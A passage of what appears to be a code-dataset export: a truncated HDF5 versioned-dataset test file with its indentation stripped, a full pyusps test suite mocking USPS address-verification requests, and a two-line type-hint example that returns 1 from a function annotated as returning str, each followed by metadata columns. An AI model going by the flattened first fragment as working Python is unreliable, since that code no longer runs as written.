assert_equal(virtual_data[0:2*DEFAULT_CHUNK_SIZE], 1.0)
assert_equal(virtual_data[2*DEFAULT_CHUNK_SIZE:3*DEFAULT_CHUNK_SIZE - 2], 3.0)
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset_offset_multidimension(h5file):
chunks = 3*(CHUNK_SIZE_3D,)
shape = (2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D)
data = np.zeros(shape)
write_dataset(h5file, 'test_data', data, chunks=chunks)
shape2 = (2*CHUNK_SIZE_3D - 2, 2*CHUNK_SIZE_3D - 2,
2*CHUNK_SIZE_3D - 2)
data2 = np.empty(shape2)
for n, c in enumerate(split_chunks(shape, chunks)):
data2[c.raw] = n
slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
virtual_data = create_virtual_dataset(h5file, 'test_version', 'test_data', slices2)
assert virtual_data.shape == shape2
assert_equal(virtual_data[()], data2)
assert virtual_data.dtype == np.float64
def test_write_dataset_chunk_size(h5file):
chunk_size = 2**10
chunks = (chunk_size,)
slices1 = write_dataset(h5file, 'test_data', np.ones((2*chunk_size,)),
chunks=chunks)
raises(ValueError, lambda: write_dataset(h5file, 'test_data',
np.ones(chunks), chunks=(2**9,)))
slices2 = write_dataset_chunks(h5file, 'test_data', {
Tuple(Slice(0*chunk_size, 1*chunk_size, 1)):
slices1[Tuple(Slice(0*chunk_size, 1*chunk_size, 1))],
Tuple(Slice(1*chunk_size, 2*chunk_size, 1)): 2*np.ones((chunk_size,)),
Tuple(Slice(2*chunk_size, 3*chunk_size, 1)): 2*np.ones((chunk_size,)),
Tuple(Slice(3*chunk_size, 4*chunk_size, 1)): 3*np.ones((chunk_size,)),
})
assert slices1 == {
Tuple(Slice(0*chunk_size, 1*chunk_size, 1)):
slice(0*chunk_size, 1*chunk_size),
Tuple(Slice(1*chunk_size, 2*chunk_size, 1)):
slice(0*chunk_size, 1*chunk_size),
}
assert slices2 == {
Tuple(Slice(0*chunk_size, 1*chunk_size, 1)):
slice(0*chunk_size, 1*chunk_size),
Tuple(Slice(1*chunk_size, 2*chunk_size, 1)):
slice(1*chunk_size, 2*chunk_size),
Tuple(Slice(2*chunk_size, 3*chunk_size, 1)):
slice(1*chunk_size, 2*chunk_size),
Tuple(Slice(3*chunk_size, 4*chunk_size, 1)):
slice(2*chunk_size, 3*chunk_size),
}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (3*chunk_size,)
assert_equal(ds[0:1*chunk_size], 1.0)
assert_equal(ds[1*chunk_size:2*chunk_size], 2.0)
assert_equal(ds[2*chunk_size:3*chunk_size], 3.0)
assert_equal(ds[3*chunk_size:4*chunk_size], 0.0)
assert ds.dtype == np.float64
def test_write_dataset_offset_chunk_size(h5file):
chunk_size = 2**10
chunks = (chunk_size,)
slices1 = write_dataset(h5file, 'test_data', 1*np.ones((2*chunk_size,)), chunks=chunks)
slices2 = write_dataset(h5file, 'test_data',
np.concatenate((2*np.ones(chunks),
2*np.ones(chunks),
3*np.ones((chunk_size - 2,)))))
assert slices1 == {
Tuple(Slice(0*chunk_size, 1*chunk_size, 1)):
slice(0*chunk_size, 1*chunk_size),
Tuple(Slice(1*chunk_size, 2*chunk_size, 1)):
slice(0*chunk_size, 1*chunk_size),
}
assert slices2 == {
Tuple(Slice(0*chunk_size, 1*chunk_size, 1)):
slice(1*chunk_size, 2*chunk_size),
Tuple(Slice(1*chunk_size, 2*chunk_size, 1)):
slice(1*chunk_size, 2*chunk_size),
Tuple(Slice(2*chunk_size, 3*chunk_size - 2, 1)):
slice(2*chunk_size, 3*chunk_size - 2),
}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (3*chunk_size,)
assert_equal(ds[0*chunk_size:1*chunk_size], 1.0)
assert_equal(ds[1*chunk_size:2*chunk_size], 2.0)
assert_equal(ds[2*chunk_size:3*chunk_size - 2], 3.0)
assert_equal(ds[3*chunk_size-2:4*chunk_size], 0.0)
def test_write_dataset_compression(h5file):
slices1 = write_dataset(h5file, 'test_data',
np.ones((2*DEFAULT_CHUNK_SIZE,)),
compression='gzip', compression_opts=3)
raises(ValueError, lambda: write_dataset(h5file, 'test_data',
np.ones((DEFAULT_CHUNK_SIZE,)), compression='lzf'))
raises(ValueError, lambda: write_dataset(h5file, 'test_data',
np.ones((DEFAULT_CHUNK_SIZE,)), compression='gzip', compression_opts=4))
assert slices1 == {
(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE)}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (1*DEFAULT_CHUNK_SIZE,)
assert_equal(ds[0:1*DEFAULT_CHUNK_SIZE], 1.0)
assert ds.dtype == np.float64
assert ds.compression == 'gzip'
assert ds.compression_opts == 3
| 45.576923
| 102
| 0.647637
| 3,726
| 23,700
| 3.769726
| 0.025228
| 0.356899
| 0.254521
| 0.129005
| 0.937847
| 0.923252
| 0.912146
| 0.897053
| 0.879681
| 0.844297
| 0
| 0.068748
| 0.217468
| 23,700
| 519
| 103
| 45.66474
| 0.688612
| 0.001097
| 0
| 0.686099
| 0
| 0
| 0.034809
| 0.01525
| 0
| 0
| 0
| 0
| 0.174888
| 1
| 0.035874
| false
| 0.002242
| 0.017937
| 0
| 0.053812
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe2b8880b31c0d29320b2db7b2950665ba48fa7c
| 21,858
|
py
|
Python
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 14
|
2015-02-02T21:02:40.000Z
|
2021-11-03T14:13:19.000Z
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 6
|
2017-12-21T19:07:38.000Z
|
2022-03-13T01:49:12.000Z
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 21
|
2015-08-28T23:25:33.000Z
|
2021-04-19T22:11:37.000Z
|
import fudge
from collections import OrderedDict
from nose.tools import eq_ as eq
from io import StringIO
from pyusps.address_information import verify
from pyusps.test.util import assert_raises, assert_errors_equal
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_simple(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
('zip_code', '20770'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip5(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
('zip_code', '20770'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_both(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E1441%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
('zip_code', '207701441'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_dash(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E1441%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
('zip_code', '20770-1441'),
])
res = verify(
'foo_id',
address
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_only(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%2F%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('zip_code', '20770'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_state_only(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_firm_name(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CFirmName%3EXYZ+Corp%3C%2FFirmName%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><FirmName>XYZ CORP</FirmName><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('firm_name', 'XYZ Corp'),
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('firm_name', 'XYZ CORP'),
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_address_extended(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%3ESuite+12%3C%2FAddress1%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address1>STE 12</Address1><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('address_extended', 'Suite 12'),
('city', 'Greenbelt'),
('state', 'MD'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address_extended', 'STE 12'),
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_urbanization(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CUrbanization%3EPuerto+Rico%3C%2FUrbanization%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Urbanization>PUERTO RICO</Urbanization><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('urbanization', 'Puerto Rico'),
('city', 'Greenbelt'),
('state', 'MD'),
])
res = verify(
'foo_id',
address,
)
expected = OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('urbanization', 'PUERTO RICO'),
('zip5', '20770'),
('zip4', '1441'),
])
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_multiple(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ECT%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="1"><Address2>8 WILDWOOD DR</Address2><City>OLD LYME</City><State>CT</State><Zip5>06371</Zip5><Zip4>1844</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
addresses = [
OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
]),
OrderedDict([
('address', '8 Wildwood Drive'),
('city', 'Old Lyme'),
('state', 'CT'),
]),
]
res = verify(
'foo_id',
*addresses
)
expected = [
OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
]),
OrderedDict([
('address', '8 WILDWOOD DR'),
('city', 'OLD LYME'),
('state', 'CT'),
('zip5', '06371'),
('zip4', '1844'),
]),
]
eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_more_than_5(fake_urlopen):
addresses = [
OrderedDict(),
OrderedDict(),
OrderedDict(),
OrderedDict(),
OrderedDict(),
OrderedDict(),
]
msg = assert_raises(
ValueError,
verify,
'foo_id',
*addresses
)
eq(str(msg), 'Only 5 addresses are allowed per request')
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_root_error(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<Error>
<Number>80040b1a</Number>
<Description>Authorization failure. Perhaps username and/or password is incorrect.</Description>
<Source>UspsCom::DoAuth</Source>
</Error>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
])
msg = assert_raises(
ValueError,
verify,
'foo_id',
address
)
expected = ('80040b1a: Authorization failure. Perhaps username '
'and/or password is incorrect.'
)
eq(str(msg), expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_address_error_single(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Error><Number>-2147219401</Number><Source>API_AddressCleancAddressClean.CleanAddress2;SOLServer.CallAddressDll</Source><Description>Address Not Found.</Description><HelpFile></HelpFile><HelpContext>1000440</HelpContext></Error></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'NJ'),
])
msg = assert_raises(
ValueError,
verify,
'foo_id',
address
)
expected = '-2147219401: Address Not Found.'
eq(str(msg), expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_address_error_multiple(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="1"><Error><Number>-2147219400</Number><Source>API_AddressCleancAddressClean.CleanAddress2;SOLServer.CallAddressDll</Source><Description>Invalid City.</Description><HelpFile></HelpFile><HelpContext>1000440</HelpContext></Error></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
addresses = [
OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
]),
OrderedDict([
('address', '8 Wildwood Drive'),
('city', 'Old Lyme'),
('state', 'NJ'),
]),
]
res = verify(
'foo_id',
*addresses
)
# eq does not work with exceptions. Process each item manually.
eq(len(res), 2)
eq(
res[0],
OrderedDict([
('address', '6406 IVY LN'),
('city', 'GREENBELT'),
('state', 'MD'),
('zip5', '20770'),
('zip4', '1441'),
]),
)
assert_errors_equal(
res[1],
ValueError('-2147219400: Invalid City.'),
)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_empty_error(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse></AddressValidateResponse>""")
fake_urlopen.returns(res)
address = OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'NJ'),
])
msg = assert_raises(
TypeError,
verify,
'foo_id',
address
)
expected = 'Could not find any address or error information'
eq(str(msg), expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_order_error(fake_urlopen):
fake_urlopen = fake_urlopen.expects_call()
req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ECT%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
fake_urlopen = fake_urlopen.with_args(req)
res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="2"><Address2>8 WILDWOOD DR</Address2><City>OLD LYME</City><State>CT</State><Zip5>06371</Zip5><Zip4>1844</Zip4></Address></AddressValidateResponse>""")
fake_urlopen.returns(res)
addresses = [
OrderedDict([
('address', '6406 Ivy Lane'),
('city', 'Greenbelt'),
('state', 'MD'),
]),
OrderedDict([
('address', '8 Wildwood Drive'),
('city', 'Old Lyme'),
('state', 'CT'),
]),
]
msg = assert_raises(
IndexError,
verify,
'foo_id',
*addresses
)
expected = ('The addresses returned are not in the same order '
'they were requested'
)
eq(str(msg), expected)
| 44.790984
| 542
| 0.628557
| 2,563
| 21,858
| 5.271947
| 0.077253
| 0.074082
| 0.049956
| 0.073268
| 0.919849
| 0.905269
| 0.905269
| 0.902605
| 0.897202
| 0.861456
| 0
| 0.095505
| 0.200979
| 21,858
| 487
| 543
| 44.882957
| 0.678156
| 0.002791
| 0
| 0.786697
| 0
| 0.06422
| 0.542739
| 0.157788
| 0
| 0
| 0
| 0
| 0.016055
| 1
| 0.036697
| false
| 0.004587
| 0.013761
| 0
| 0.050459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe30ddc02b454a893268e338d20304d6046b832c
| 36
|
py
|
Python
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 8
|
2016-07-15T19:58:29.000Z
|
2021-03-11T09:57:11.000Z
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 2
|
2015-11-26T13:54:52.000Z
|
2016-03-03T13:04:17.000Z
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 6
|
2016-03-01T13:05:00.000Z
|
2016-10-11T16:37:18.000Z
|
def greeting() -> str:
return 1
| 12
| 22
| 0.583333
| 5
| 36
| 4.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.277778
| 36
| 2
| 23
| 18
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
